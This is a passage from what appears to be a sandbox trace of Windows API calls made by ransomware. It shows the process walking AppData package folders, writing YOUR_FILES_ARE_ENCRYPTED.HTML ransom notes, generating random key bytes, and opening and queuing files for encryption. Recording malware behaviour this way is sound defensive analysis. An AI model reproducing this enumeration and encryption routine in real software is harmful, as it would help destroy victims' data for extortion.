lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0118.282] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89a1a852, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a1a852, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89a1a852, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0118.282] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.282] wnsprintfW (in: pszDest=0x698498, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\LocalCache") returned 113 [0118.282] GetProcessHeap () returned 0x600000 [0118.282] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0118.282] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\LocalCache" [0118.282] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\LocalCache\\*" [0118.282] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89a1a852, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a1a852, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89a1a852, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d7e, dwReserved1=0x3187cb0, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0118.283] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89a1a852, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a1a852, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89a1a852, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d7e, dwReserved1=0x3187cb0, cFileName="..", cAlternateFileName="")) returned 1 [0118.284] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89a1a852, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a1a852, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89a1a852, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d7e, dwReserved1=0x3187cb0, cFileName="..", cAlternateFileName="")) returned 0 [0118.284] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0118.284] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 143 [0118.284] GetProcessHeap () returned 0x600000 [0118.284] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.284] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.assignedaccesslockapp_cw5n1h2txyewy\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0118.285] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0118.286] CloseHandle (hObject=0x324) returned 1 [0118.286] GetProcessHeap () returned 0x600000 [0118.286] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.286] GetProcessHeap () returned 0x600000 [0118.286] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0118.287] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89a1a852, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a1a852, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89a1a852, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0118.287] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.287] wnsprintfW (in: pszDest=0x698498, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\LocalState") returned 113 [0118.287] GetProcessHeap () returned 0x600000 [0118.287] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0118.288] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\LocalState" [0118.288] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\LocalState\\*" [0118.288] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89a1a852, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a1a852, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89a1a852, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d7e, dwReserved1=0x3187cb0, cFileName=".", cAlternateFileName="")) returned 0x626838 [0118.288] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89a1a852, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a1a852, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89a1a852, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d7e, dwReserved1=0x3187cb0, cFileName="..", cAlternateFileName="")) returned 1 [0118.288] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89a1a852, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a1a852, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89a1a852, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d7e, dwReserved1=0x3187cb0, cFileName="..", cAlternateFileName="")) returned 0 [0118.288] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0118.288] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 143 [0118.288] GetProcessHeap () returned 0x600000 [0118.288] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.289] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.assignedaccesslockapp_cw5n1h2txyewy\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0118.290] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0118.291] CloseHandle (hObject=0x324) returned 1 [0118.291] GetProcessHeap () returned 0x600000 [0118.291] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.291] GetProcessHeap () returned 0x600000 [0118.291] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0118.292] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89c56a54, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89c56a54, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89c56a54, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Microsoft.Windows.AssignedAccessLockApp_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy", cAlternateFileName="MICROS~1.0_N")) returned 1 [0118.292] StrStrIW (lpFirst="Microsoft.Windows.AssignedAccessLockApp_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.292] wnsprintfW (in: pszDest=0x698498, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Microsoft.Windows.AssignedAccessLockApp_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy") returned 187 [0118.292] GetProcessHeap () returned 0x600000 [0118.292] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0118.293] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Microsoft.Windows.AssignedAccessLockApp_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Microsoft.Windows.AssignedAccessLockApp_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Microsoft.Windows.AssignedAccessLockApp_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy" [0118.293] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Microsoft.Windows.AssignedAccessLockApp_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Microsoft.Windows.AssignedAccessLockApp_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Microsoft.Windows.AssignedAccessLockApp_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\*" [0118.293] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Microsoft.Windows.AssignedAccessLockApp_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89c56a54, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89c56a54, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89c56a54, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d7e, dwReserved1=0x3187cb0, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0118.293] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89c56a54, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89c56a54, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89c56a54, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d7e, dwReserved1=0x3187cb0, cFileName="..", cAlternateFileName="")) returned 1 [0118.293] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89c56a54, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89ca2f32, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89ca2f32, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d7e, dwReserved1=0x3187cb0, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 1 [0118.293] StrStrIW (lpFirst="ActivationStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.293] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Microsoft.Windows.AssignedAccessLockApp_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore") returned 203 [0118.293] GetProcessHeap () returned 0x600000 [0118.293] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0118.294] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Microsoft.Windows.AssignedAccessLockApp_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Microsoft.Windows.AssignedAccessLockApp_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Microsoft.Windows.AssignedAccessLockApp_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore" [0118.294] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Microsoft.Windows.AssignedAccessLockApp_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Microsoft.Windows.AssignedAccessLockApp_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Microsoft.Windows.AssignedAccessLockApp_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\*" [0118.294] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Microsoft.Windows.AssignedAccessLockApp_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89c56a54, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89ca2f32, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89ca2f32, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6d68c8, dwReserved1=0x3187cb8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0118.295] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89c56a54, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89ca2f32, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89ca2f32, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6d68c8, dwReserved1=0x3187cb8, cFileName="..", cAlternateFileName="")) returned 1 [0118.295] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89c56a54, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89e92d07, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89e92d07, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x6d68c8, dwReserved1=0x3187cb8, cFileName="ActivationStore.dat", cAlternateFileName="ACTIVA~1.DAT")) returned 1 [0118.295] StrStrIW (lpFirst="ActivationStore.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.295] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Microsoft.Windows.AssignedAccessLockApp_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat") returned 223 [0118.295] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0118.295] lstrlenW (lpString=".dat") returned 4 [0118.295] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0118.295] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0118.295] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Microsoft.Windows.AssignedAccessLockApp_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.assignedaccesslockapp_cw5n1h2txyewy\\microsoft.windows.assignedaccesslockapp_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\activationstore\\activationstore.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0118.296] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=8192) returned 1 [0118.296] GetProcessHeap () returned 0x600000 [0118.296] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0118.298] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="BD") returned 2 [0118.299] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="D2") returned 2 [0118.299] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="D2") returned 2 [0118.299] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="26") returned 2 [0118.299] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="EE") returned 2 [0118.299] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="2A") returned 2 [0118.299] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="AB") returned 2 [0118.299] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="E3") returned 2 [0118.299] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="F6") returned 2 [0118.299] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="B1") returned 2 [0118.299] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="63") returned 2 [0118.299] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="51") returned 2 [0118.299] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="D3") returned 2 [0118.299] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="C0") returned 2 [0118.299] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="D9") returned 2 [0118.299] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="6E") returned 2 [0118.299] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="44") returned 2 [0118.299] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="18") returned 2 [0118.299] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="96") returned 2 [0118.299] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="F9") returned 2 [0118.299] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="24") returned 2 [0118.299] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="B5") returned 2 [0118.299] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="A6") returned 2 [0118.299] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="BF") returned 2 [0118.299] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="A5") returned 2 [0118.299] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="DE") returned 2 [0118.299] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="E1") returned 2 [0118.299] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="2E") returned 2 [0118.299] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="D3") returned 2 [0118.299] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="FC") returned 2 [0118.299] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="FB") returned 2 [0118.299] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="42") returned 2 [0118.300] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Microsoft.Windows.AssignedAccessLockApp_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Microsoft.Windows.AssignedAccessLockApp_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\Microsoft.Windows.AssignedAccessLockApp_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat" [0118.300] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0118.300] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0118.300] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x89ca2f32, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89ca2f32, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89ca2f32, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x6d68c8, 